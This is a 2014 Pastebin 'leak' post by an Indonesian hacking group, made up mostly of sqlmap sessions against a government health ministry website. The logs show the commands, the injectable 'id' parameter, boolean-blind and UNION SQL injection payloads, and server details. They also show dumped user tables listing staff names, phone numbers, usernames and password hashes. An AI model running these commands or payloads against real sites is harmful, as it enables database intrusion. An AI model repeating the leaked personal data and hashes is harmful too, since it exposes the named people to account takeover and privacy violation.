API tools faq
paste
RussX9

Depkes.go.id

RussX9
Aug 23rd, 2014
494
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.43 KB | None | 0 0
raw download clone embed print report
  1. [-----------------------]
  2. #Leaked By : RussX9
  3. # FB : https://www.facebook.com/405forbiden
  4. # email : [email protected] | [email protected]
  5. #Indonesian Hacker Cyber team
  6. # YunoGasai | Dr.1n73ction | 404_Proxy | Larva_ROOT | Dandi Dot ID | FR_Dot_Id | Killuax404 | X-GHOST404 | TRUTH404 | Mr.Al404 |3xpl01t1n6 | Bl4ckUmbrell4_404 | umar dot id | Dzikri Dot ID | Haxor_Dd05 | riko_sinkadorable
  7. [-]-----------------------[+]
  8.  
  9. [+]==================[+]
  10. Greatz To : Indonesian BLACKHATS CYBER TEAM , Odong-Odong UNDERGROUND , Mauritania Hacker Team
  11. Root@Greatz#~ > ./Na-Z ./Sickpeoples ./SvN_Nevermore ./Mr.ApaPedulimu ./Anzi007 ./Mr.SaputraAttackerXX ./D22 ./Sakinah ./cybercrows ./RkeNz_007 ./MoXat ./BL4CK_GHOST
  12. [+]==================[+]
  13.  
  14. root@localhost:~# sqlmap -u http://Depkes.go.id/article.php?id=sensor --dbs
  15. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  16. http://sqlmap.org
  17.  
  18. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  19.  
  20. [*] starting at 02:47:03
  21.  
  22. [02:47:03] [INFO] resuming back-end DBMS 'mysql'
  23. [02:47:03] [INFO] testing connection to the target URL
  24. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  25. ---
  26. Place: GET
  27. Parameter: id
  28. Type: boolean-based blind
  29. Title: AND boolean-based blind - WHERE or HAVING clause
  30. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  31.  
  32. Type: UNION query
  33. Title: MySQL UNION query (NULL) - 8 columns
  34. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  35. ---
  36. [02:47:05] [INFO] the back-end DBMS is MySQL
  37. web server operating system: Linux Debian 6.0 (squeeze)
  38. web application technology: PHP 5.3.3, Apache 2.2.16
  39. back-end DBMS: MySQL 5
  40. [02:47:05] [INFO] fetching database names
  41. available databases [3]:
  42. [*] information_schema
  43. [*] portal
  44. [*] project_newgosid
  45. root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -T ant_sys_user --dump
  46.  
  47. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  48. http://sqlmap.org
  49.  
  50. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  51.  
  52. [*] starting at 02:49:44
  53.  
  54. [02:49:44] [INFO] resuming back-end DBMS 'mysql'
  55. [02:49:44] [INFO] testing connection to the target URL
  56. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  57. ---
  58. Place: GET
  59. Parameter: id
  60. Type: boolean-based blind
  61. Title: AND boolean-based blind - WHERE or HAVING clause
  62. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  63.  
  64. Type: UNION query
  65. Title: MySQL UNION query (NULL) - 8 columns
  66. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  67. ---
  68. [02:49:46] [INFO] the back-end DBMS is MySQL
  69. web server operating system: Linux Debian 6.0 (squeeze)
  70. web application technology: PHP 5.3.3, Apache 2.2.16
  71. back-end DBMS: MySQL 5
  72. [02:49:46] [INFO] fetching tables for database: 'Portal'
  73. Database: portal
  74. Table: ants_sys_user
  75. [4 entries]
  76. +------------------------+--------------+----------------+-----------+----------------------------------+
  77. | email_address | phone_number | user_full_name | user_name | user_password |
  78. +------------------------+--------------+----------------+-----------+----------------------------------+
  79. | [email protected] | 085717389000 | Suwanto | Suwanto | ebbf35aaa36fc8caf5f810aa83fa49e3 |
  80. | [email protected] | 08129516082 | nuning | nuning | 14e50d9f59d66f5e4a5e8e134973bf1a |
  81. | unknown | unknown | ismail | ismail | edd13a0018ac0d2e71f827125b1b3532 |
  82. | [email protected] | 08128512730 | istiqomah | isti | 42a1e5c0481df236f8774677b2b65188 |
  83. +------------------------+--------------+----------------+-----------+----------------------------------+
  84.  
  85. [02:49:46] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.depkes.go.id'
  86.  
  87. [*] shutting down at 02:49:46
  88. root@localhost:~# sqlmap -u http://depkes.go.id/article.php?id=sensor -D Portal -t joy_users --Dump
  89.  
  90. sqlmap/1.0-dev - automatic SQL injection and database takeover tool
  91. http://sqlmap.org
  92.  
  93. [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
  94.  
  95. [*] starting at 02:49:44
  96.  
  97. [02:49:44] [INFO] resuming back-end DBMS 'mysql'
  98. [02:49:44] [INFO] testing connection to the target URL
  99. sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
  100. ---
  101. Place: GET
  102. Parameter: id
  103. Type: boolean-based blind
  104. Title: AND boolean-based blind - WHERE or HAVING clause
  105. Payload: id=332' AND 6287=6287 AND 'Akdb'='Akdb
  106.  
  107. Type: UNION query
  108. Title: MySQL UNION query (NULL) - 1 columns
  109. Payload: id=332' UNION ALL SELECT NULL,CONCAT(0x7167757071,0x754670726e627345537a,0x7162756571),NULL,NULL,NULL,NULL,NULL,NULL#
  110. ---
  111. [02:49:46] [INFO] the back-end DBMS is MySQL
  112. web server operating system: Linux Debian 6.0 (squeeze)
  113. web application technology: PHP 5.3.3, Apache 2.2.16
  114. back-end DBMS: MySQL 5
  115. [02:49:46] [INFO] fetching tables for database: 'Portal'
  116. Database: portal
  117. Table: jos_users
  118. [1 entry]
  119. +--------------------+-------------------------------------------------------------------+----------+
  120. | email | password | username |
  121. +--------------------+-------------------------------------------------------------------+----------+
  122. | [email protected] | 35d1b3c70e13825c0d4a67843adbf6ef:sQEMDKp8NKGSLMMKP5DocOSMwO1uCV3l | admin |
  123. +--------------------+-------------------------------------------------------------------+----------+
  124. [*] Shuting Down At : 02:59:12
  125.  
  126. Root@Localhost#~
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!